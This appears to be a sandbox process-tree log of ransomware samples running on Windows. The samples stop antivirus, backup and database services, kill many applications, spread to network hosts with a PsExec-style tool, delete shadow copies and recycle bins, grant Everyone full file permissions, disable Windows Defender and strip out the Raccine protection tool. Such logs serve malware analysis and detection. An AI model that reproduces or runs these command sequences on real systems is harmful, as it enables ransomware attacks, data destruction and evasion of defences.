-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\X$3⤵PID:4472
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\Y$3⤵PID:5168
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos System Protection Service” /y3⤵PID:4388
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDeviceMediaService /y3⤵PID:5804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y4⤵PID:4792
-
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\Z$3⤵PID:5228
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y3⤵PID:6060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y4⤵PID:5332
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Web Control Service” /y3⤵PID:4708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y4⤵PID:4264
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y3⤵PID:6088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵PID:5464
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROD /y3⤵PID:6080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y4⤵PID:4924
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y3⤵PID:4776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y4⤵PID:944
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y3⤵PID:4760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y4⤵PID:4548
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y3⤵PID:612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y4⤵PID:5940
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Antivirus /y3⤵PID:4484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y4⤵PID:4572
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y3⤵PID:4996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵PID:4836
-
-
-
C:\Windows\TEMP\kyiwrlef.exe"C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.36 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"3⤵PID:5864
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵PID:6008
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.10.0.10\Users3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
PID:4848
-
-
C:\Windows\TEMP\kyiwrlef.exe"C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.10 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"3⤵PID:5384
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵PID:5268
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵PID:4208
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵PID:1752
-
-
C:\Windows\TEMP\kyiwrlef.exe"C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.38 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"3⤵PID:5708
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵PID:6068
-
-
C:\Windows\TEMP\kyiwrlef.exe"C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"3⤵PID:5000
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵PID:4948
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵PID:1332
-
-
C:\Windows\TEMP\kyiwrlef.exe"C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.39 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"3⤵PID:1972
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F3⤵PID:4856
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F3⤵PID:4296
-
-
C:\Windows\TEMP\kyiwrlef.exe"C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.21 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"3⤵PID:4620
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F3⤵PID:4940
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4932
-
-
-
C:\Windows\TEMP\kyiwrlef.exe"C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.41 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"3⤵PID:2808
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F3⤵PID:5800
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F3⤵PID:5052
-
-
C:\Windows\TEMP\kyiwrlef.exe"C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.24 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"3⤵PID:4464
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F3⤵PID:2756
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F3⤵PID:5468
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F3⤵
- Kills process with taskkill
PID:4900
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F3⤵PID:2140
-
-
C:\Windows\TEMP\kyiwrlef.exe"C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.27 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"3⤵PID:2264
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F3⤵PID:4376
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F3⤵PID:5332
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F3⤵
- Kills process with taskkill
PID:4264
-
-
C:\Windows\TEMP\kyiwrlef.exe"C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.30 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"3⤵PID:5492
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F3⤵PID:4988
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
PID:5956
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F3⤵PID:5968
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵PID:4548
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F3⤵PID:5628
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵PID:5936
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F3⤵PID:2320
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F3⤵PID:5328
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F3⤵PID:6120
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F3⤵
- Kills process with taskkill
PID:4544
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F3⤵PID:5188
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F3⤵
- Kills process with taskkill
PID:2044
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F3⤵PID:2256
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F3⤵
- Kills process with taskkill
PID:296
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F3⤵PID:5636
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵PID:5060
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F3⤵PID:5808
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F3⤵
- Kills process with taskkill
PID:1740
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
PID:4224
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F3⤵PID:4540
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
PID:5748
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F3⤵
- Kills process with taskkill
PID:2292
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F3⤵
- Kills process with taskkill
PID:5924
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F3⤵PID:5416
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.10.0.15\Users3⤵PID:2328
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F3⤵
- Kills process with taskkill
PID:5348
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F3⤵
- Kills process with taskkill
PID:5500
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F3⤵
- Kills process with taskkill
PID:1972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }3⤵PID:2584
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:6016
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:3432
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5716
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.10.0.18\Users3⤵PID:4356
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.10.0.21\Users3⤵PID:5512
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.10.0.24\Users3⤵PID:6136
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.10.0.27\Users3⤵PID:6072
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.10.0.30\Users3⤵PID:4748
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub1⤵PID:4156
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵PID:5320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y1⤵PID:5940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵PID:6096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y1⤵PID:6036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵PID:5192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y1⤵PID:4392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y1⤵PID:5340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y1⤵PID:4212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y1⤵PID:4620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y1⤵PID:5052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y1⤵PID:5488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:5336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y1⤵PID:5652
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵PID:5592
-
C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:4828
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵PID:4100
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵PID:4044
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
PID:4820
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵PID:4428
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto3⤵PID:3876
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto3⤵PID:5616
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵PID:1892
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto3⤵PID:4388
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled3⤵PID:4776
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵PID:5168
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto3⤵PID:1672
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled3⤵PID:5588
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
PID:3988
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵PID:4724
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
PID:276
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵PID:5188
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵PID:5328
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵
- Kills process with taskkill
PID:5628
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵PID:5268
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
PID:2808
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵PID:5020
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵PID:4412
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F3⤵
- Kills process with taskkill
PID:5764
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F3⤵PID:2204
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F3⤵
- Kills process with taskkill
PID:4612
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵
- Kills process with taskkill
PID:1236
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F3⤵
- Kills process with taskkill
PID:4940
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F3⤵
- Kills process with taskkill
PID:5728
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵PID:6020
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F3⤵PID:5708
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F3⤵PID:4452
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F3⤵
- Kills process with taskkill
PID:5860
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F3⤵PID:6000
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F3⤵PID:1680
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F3⤵PID:196
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F3⤵
- Kills process with taskkill
PID:4672
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F3⤵
- Kills process with taskkill
PID:4244
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F3⤵PID:5396
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F3⤵
- Kills process with taskkill
PID:4572
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F3⤵
- Kills process with taskkill
PID:4560
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F3⤵PID:5804
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F3⤵
- Kills process with taskkill
PID:5080
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F3⤵
- Kills process with taskkill
PID:6008
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F3⤵
- Kills process with taskkill
PID:4184
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F3⤵
- Kills process with taskkill
PID:4552
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F3⤵
- Kills process with taskkill
PID:5492
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F3⤵PID:2256
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F3⤵
- Kills process with taskkill
PID:2264
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F3⤵PID:2140
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
PID:1736
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F3⤵PID:4044
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F3⤵PID:5628
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F3⤵PID:1176
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵PID:4520
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F3⤵PID:2872
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F3⤵
- Kills process with taskkill
PID:2224
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F3⤵
- Kills process with taskkill
PID:5048
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F3⤵PID:5200
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F3⤵
- Kills process with taskkill
PID:5748
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }3⤵PID:3552
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:4224
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:4744
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:2584
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:4452
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin3⤵PID:6020
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵PID:4280
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:4732
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵PID:4848
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵PID:5672
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:4456
-
-
-
C:\Windows\PAExec-4892-RJMQBVDN.exeC:\Windows\PAExec-4892-RJMQBVDN.exe -service1⤵PID:4444
-
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵PID:4700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled3⤵PID:3964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵PID:2832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true3⤵PID:4384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true3⤵PID:5908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true3⤵PID:612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true3⤵PID:4196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true3⤵PID:5956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force3⤵PID:5168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 63⤵PID:5856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 03⤵PID:5060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 63⤵PID:1176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 63⤵PID:5796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true3⤵PID:4756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 23⤵PID:5044
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵
- Kills process with taskkill
PID:4272
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵PID:5300
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
PID:1172
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵PID:3552
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto3⤵PID:3100
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto3⤵PID:1404
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵PID:252
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:3396
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto3⤵PID:944
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵PID:5488
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵PID:3592
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵PID:6060
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto3⤵PID:636
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
PID:4500
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵PID:6120
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵PID:4576
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵PID:6116
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵PID:4348
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
PID:4740
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵PID:3820
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵
- Kills process with taskkill
PID:680
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵
- Kills process with taskkill
PID:1732
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵PID:264
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵
- Kills process with taskkill
PID:4920
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵PID:5032
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F3⤵
- Kills process with taskkill
PID:1280
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F3⤵
- Kills process with taskkill
PID:808
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F3⤵
- Kills process with taskkill
PID:3552
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F3⤵
- Kills process with taskkill
PID:6116
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F3⤵PID:5928
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F3⤵PID:5612
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F3⤵
- Kills process with taskkill
PID:4416
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F3⤵
- Kills process with taskkill
PID:5148
-
-
